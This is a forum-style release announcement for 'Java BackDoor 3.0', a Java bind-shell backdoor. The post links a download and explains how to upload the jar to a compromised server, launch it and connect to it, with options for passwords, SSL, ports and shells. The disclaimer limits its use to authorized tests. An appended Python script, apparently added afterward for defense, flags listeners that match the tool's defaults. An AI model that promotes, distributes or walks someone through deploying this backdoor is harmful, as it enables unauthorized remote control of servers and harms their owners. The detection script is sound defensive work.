USE ONLY DURING LEGAL AND AUTHORIZED ACTIVITIES, e.g. penetration tests with a legal agreement.
Java BackDoor 3.0 released! http://www.mediafire.com/file/zmh2mk1wdn5/jbd-3.0.jar
jbd is a normal backdoor (it is NOT a reverse shell; I am working on it), written in Java. This means you can use it everywhere* without rebuilding. Like any backdoor, find a way to upload it to the server, then launch it (if you use jbd without arguments: /path/to/java -jar /path/to/jbd-3.0.jar, it will open a backdoor for all IPs at port 65000).
Use java -jar jbd-3.0.jar --help for detailed help and a usage guide.
jbd has additional options and features (everything is set on the command line; there are no config files):
- NEW: SSL support to encrypt everything passing through the backdoor and keep your customer’s files safe :)
- Choose ip and/or port, shell and/or its path (for example, listen only on localhost 127.0.0.1, port 65432 executing /usr/ucb/i/dont/know/csh)
- Set a password, either in cleartext (-P option) or in MD5 (-M option); if you choose the second one, run java -jar jbd-3.0.jar --md5 YourPasswordHere on your PC to display the Java MD5 of the password, then use it on the server with the -M option (this will avoid any potential problem related to MD5)
- Easy to use: just telnet to the IP and PORT where you bound it
- If you created an SSL jbd, on your clients just use java -jar jbd-3.0.jar --ssl-client to use the backdoor
- It can handle multiple clients
- IT IS NOT INTERACTIVE (do not use commands like ssh or passwd!!!)
- You can use it on both Windows and *X (it was written and tested mostly on *X operating systems)
- If a telnet session hangs, just exit (Ctrl+Alt+^], …) and open another one.
- You can kill the process, closing the backdoor and disconnecting all clients, simply by typing Bye. at the prompt, while exit will close only your session.
- You can set a password
- You can use cd command to change directory
- Compatibility with Java JDK > 1.3; theoretically it should work even with Java 1.3. SSL compatibility is with JDK > 1.3, but you may give it a try on old servers!
- Tested on GNU/Linux with Java 1.5, 1.6; tested on MS Windows XP SP2 and Win7 with Java 1.4, 1.5, 1.6. Tested on Sun OS 5.9/8 with Java 1.4. Tested on HP-UX with an unspecified JVM.
- Trace client activities on stdout (command and execution code; with --verbose you can add much more output)
- Has some problems with reverse DNS: some OSes try to do a reverse DNS query even if we do not care about or want it. This can cause unexpected waits, so please be patient
Please post any comment if you find it useful. In addition, post any suggestion and, if you know how, give me hints to implement interactivity in Java (it seems the JVM doesn’t provide a “tty handle” API, but I am not so sure).
I have been working on jbd since December 2008; it was born as a “copy/paste” of some classes from the wsh backdoor spawn feature. Then I used it many times on servers where I could not use C backdoors (lack of compiler) or perl ones (lack of perl). While you may not find perl/gcc or you may have issues with a compiled version of a known backdoor, with Java you have a more standard environment that does not usually fail (but this is not definitely true :)). As I started to use it in a continuous way, I added a password and an SSL functionality, so this is a quite-tested work created by a tester for other testers: remember, use it only if you are doing something legal and approved.
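A defender's view of the defaults described above, as an added example that is not part of the original post or of jbd: it correlates a listening-socket listing with a process listing to flag Java listeners matching the stated defaults (all interfaces, port 65000, a `jbd-*.jar` command line). The `ss -ltnp` and `ps -eo pid,args` output is constructed sample data, and the function names are hypothetical.

```python
import re

# Constructed sample data (not captured from a real host).
SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=811,fd=3))
LISTEN 0 50 *:65000 *:* users:(("java",pid=4242,fd=7))
LISTEN 0 100 127.0.0.1:8080 0.0.0.0:* users:(("java",pid=1500,fd=45))
LISTEN 0 50 *:65432 *:* users:(("java",pid=4300,fd=7))
"""
PS_OUTPUT = """\
811 /usr/sbin/sshd -D
1500 /usr/bin/java -jar /opt/app/service.jar
4242 /usr/bin/java -jar /tmp/jbd-3.0.jar
4300 /usr/bin/java -jar /var/tmp/update.jar
"""

# local address, local port, process name and pid from one `ss -ltnp` row
LISTEN_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')
WILDCARD = {"*", "0.0.0.0", "[::]"}
DEFAULT_PORT = 65000                      # default port stated in the post
JAR_RE = re.compile(r'-jar\s+\S*jbd-[\d.]+\.jar')   # file name is trivially renamed

def parse_ps(text):
    """Map pid -> full command line from `ps -eo pid,args` style rows."""
    procs = {}
    for line in text.splitlines():
        pid, _, args = line.strip().partition(" ")
        if pid.isdigit():
            procs[int(pid)] = args.strip()
    return procs

def find_suspects(ss_text, ps_text):
    """Return (pid, port, reasons) for each java listener with an indicator."""
    procs = parse_ps(ps_text)
    findings = []
    for line in ss_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m or m.group(3) != "java":
            continue
        addr, port, pid = m.group(1), int(m.group(2)), int(m.group(4))
        checks = [("listens-on-all-interfaces", addr in WILDCARD),
                  ("default-port", port == DEFAULT_PORT),
                  ("jar-name", bool(JAR_RE.search(procs.get(pid, ""))))]
        reasons = [name for name, hit in checks if hit]
        if reasons:
            findings.append((pid, port, reasons))
    return findings

if __name__ == "__main__":
    for pid, port, reasons in find_suspects(SS_OUTPUT, PS_OUTPUT):
        print(f"pid={pid} port={port} indicators={','.join(reasons)}")
```

The port, bind address and file name can all be changed, so a Java process listening on all interfaces with no other indicator (pid 4300 in the sample) still deserves triage against the host's expected services.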